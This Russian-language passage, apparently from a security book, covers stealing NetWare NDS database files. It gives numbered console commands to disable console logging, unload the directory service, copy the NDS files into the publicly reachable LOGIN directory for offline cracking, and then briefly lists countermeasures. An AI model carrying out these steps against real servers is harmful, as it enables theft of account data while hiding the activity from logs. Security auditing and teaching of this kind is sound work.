Получение доступа к файлам NDS
jcmd
За последние шесть лет компания JRB Software Limited разработала прекрасные утилиты для системы NetWare, многие из которых можно применять для аудита ее системы безопасности. Однако в отличие от сценариев NetBasic, утилита jcmd не позволяет скопировать открытые файлы NDS. Так что, как и модуль dsmaint.nlm, ее не рекомендуется устанавливать на рабочем сервере. Для обхода этого ограничения необходимо выгрузить службу каталогов. Чтобы скопировать файлы NDS с помощью утилиты jcmd, выполните следующие действия.
- Подключите сетевой диск, указав путь к каталогу SYS: SYSTEM.
- Скопируйте на сетевой диск модуль jcmd.nlm.
- С помощью команды rconsole получите доступ к виртуальной консоли.
- unload conlog (удаляет утилиту, регистрирующую консольные сообщения, и отключает режим регистрации).
- unload ds.
- load jcmd
- cd \_netware (на экране появится информация, представленная на следующем рисунке).
- dir *.* (для того чтобы с помощью модуля jcmd увидеть имена файлов, нужно использовать символы шаблона)
- md \login\nds.
- copy block.nds \login\nds.
- copy entry.nds \login\nds.
- copy partitio.nds \login\nds.
- copy value.nds \Iogin\nds.
- exit (выход из оболочки).
- load ds.
- load conlog.
- Co стороны клиента воспользуйтесь командой map и подключите сетевой диск, указав путь к каталогу LOGIN\NDS.
- Скопируйте файлы *.NDS на свой локальный компьютер.
- Приступайте к взлому.
Контрмеры против "захвата" файлов NDS
Меры защиты против "захвата" данных NDS сводятся к уменьшению количества средств, которые могут быть для этого использованы.
- Зашифруйте пароль утилиты rconsole, как описывалось выше.
- Удалите модуль netbasic.nlm из каталога SYS: \SYSTEM и примените к этому каталогу утилиту purge. Как правило, этот модуль оказывается ненужным.